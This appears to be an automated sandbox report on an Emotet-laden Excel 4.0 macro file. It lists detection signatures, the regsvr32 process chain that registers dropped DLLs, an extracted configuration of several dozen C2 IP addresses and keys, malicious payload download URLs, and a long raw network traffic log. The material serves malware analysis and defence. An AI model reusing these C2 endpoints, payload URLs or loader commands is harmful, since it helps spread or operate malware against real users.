
Windows Analysis Report
Untitled-09112022.xls

Overview

General Information

Sample Name: Untitled-09112022.xls
Analysis ID: 747191
MD5: 8079b54a0c76ba1fec822059aa22ea31
SHA1: c71c6fd2c68cc8746e778e907984927458a13ab8
SHA256: 9d0827721715ca365e0138d9a0bbef43bf209005605793b35e3e9b73337426a6

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3024 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1528 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1552 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2484 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2428 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 280 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 1448 cmdline: C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
Malware Configuration (Emotet): {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU00LrOacIAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWzrrOacIAAJA="]}
Source | Rule | Description | Author | Strings
Untitled-09112022.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148aa:$s1: Excel
  • 0x1593f:$s1: Excel
  • 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\Untitled-09112022.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x148aa:$s1: Excel
  • 0x1593f:$s1: Excel
  • 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\4DF60000 | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x14aaa:$s1: Excel
  • 0x15b3c:$s1: Excel
  • 0x3381:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\4DF60000 | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
Source | Rule | Description | Author | Strings
00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Emotet_3 | Yara detected Emotet | Joe Security
00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
Source | Rule | Description | Author | Strings
11.2.regsvr32.exe.2b0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.160000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
11.2.regsvr32.exe.2b0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
4.2.regsvr32.exe.4d0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.160000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
No Sigma rule has matched

Snort IDS alerts

Timestamp: 11/16/22-05:44:10.140861
Source IP: 192.168.2.22
Destination IP: 218.38.121.17
Source Port: 49179
Destination Port: 443
SID: 2404326
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/16/22-05:43:55.004674
Source IP: 192.168.2.22
Destination IP: 115.178.55.22
Source Port: 49175
Destination Port: 80
SID: 2404304
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: Untitled-09112022.xls | ReversingLabs: Detection: 46%
Source: Untitled-09112022.xls | Virustotal: Detection: 61%
Source: http://www.cecambrils.cat/wp-content/cXEhHssszV/ | Avira URL Cloud: Label: malware
Source: http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/ | Avira URL Cloud: Label: malware
Source: http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/ | Avira URL Cloud: Label: malware
Source: http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/ | Avira URL Cloud: Label: malware
Source: cecambrils.cat | Virustotal: Detection: 7%
Source: www.stickers-et-deco.com | Virustotal: Detection: 12%
Source: hsweixintp.com | Virustotal: Detection: 14%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll | ReversingLabs: Detection: 69%
Source: C:\Users\user\elv1.ooocccxxx | ReversingLabs: Detection: 69%
Source: C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy) | ReversingLabs: Detection: 69%
Source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet {"C2 list": ["172.105.115.71:8080", "218.38.121.17:443", "186.250.48.5:443", "103.71.99.57:8080", "85.214.67.203:8080", "85.25.120.45:8080", "139.196.72.155:8080", "103.85.95.4:8080", "198.199.70.22:8080", "209.239.112.82:8080", "78.47.204.80:443", "36.67.23.59:443", "104.244.79.94:443", "62.171.178.147:8080", "195.77.239.39:8080", "103.56.149.105:8080", "80.211.107.116:8080", "93.104.209.107:8080", "174.138.33.49:7080", "202.28.34.99:8080", "178.62.112.199:8080", "114.79.130.68:443", "118.98.72.86:443", "103.41.204.169:8080", "178.238.225.252:8080", "83.229.80.93:8080", "46.101.98.60:8080", "82.98.180.154:7080", "87.106.97.83:7080", "196.44.98.190:8080", "139.59.80.108:8080", "103.224.241.74:8080", "103.254.12.236:7080", "185.148.169.10:8080", "165.22.254.236:8080", "37.44.244.177:8080", "54.37.228.122:443", "51.75.33.122:443", "128.199.217.206:443", "188.165.79.151:443", "210.57.209.142:8080", "160.16.143.191:8080", "175.126.176.79:8080", "202.134.4.210:7080", "103.126.216.86:443", "190.145.8.4:443", "128.199.242.164:8080", "64.227.55.231:8080"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU00LrOacIAAIg=", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCWzrrOacIAAJA="]}
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018004A020 CryptStringToBinaryA,CryptStringToBinaryA,
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 218.38.121.17:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180029290 FindFirstFileExW,
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018002972C FindFirstFileExW,FindNextFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021DA80 FindNextFileW,FindFirstFileW,FindClose,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0203DA80 FindNextFileW,FindFirstFileW,FindClose,

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: Ji8QgmpX3lS3yT[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | DNS query: name: hsweixintp.com
Source: global traffic | DNS query: name: hsweixintp.com
Source: global traffic | DNS query: name: www.stickers-et-deco.com
Source: global traffic | DNS query: name: www.cecambrils.cat
Source: global traffic | DNS query: name: www.clinicaportalpsicologia.com.br
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
                        Source: global trafficTCP traffic: 45.207.116.88:80 -> 192.168.2.22:49171
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.207.116.88:80
